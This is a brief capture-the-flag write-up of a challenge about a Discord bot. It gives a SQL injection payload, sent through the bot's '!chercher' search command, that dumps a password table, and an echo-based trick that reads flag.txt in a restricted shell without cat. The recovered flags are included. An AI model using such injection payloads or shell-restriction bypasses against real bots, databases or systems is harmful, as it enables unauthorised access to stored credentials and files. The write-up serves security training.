Utilisateur suspicieux
Part 1
Task
We need to investigate a discord bot that we find out to be Je suis un gentil humain#0364.
Seems like there's the command !chercher that let's you search inside a database. So by trial and error we find the flag with :
!chercher "UNION SELECT * FROM password#
Flag : 404CTF{D1sc0rd_&_injection_SQL}
Part 2
Here we gain access to the debugger which is a shell stripped out of alot of commands. We have echo so to print the contents of flag.txt without cat :
bash-4.4$ echo "$(<flag.txt)"
echo "$(<flag.txt)"
404CTF{17_s_4g155417_3n_f4iT_d_1_b0t}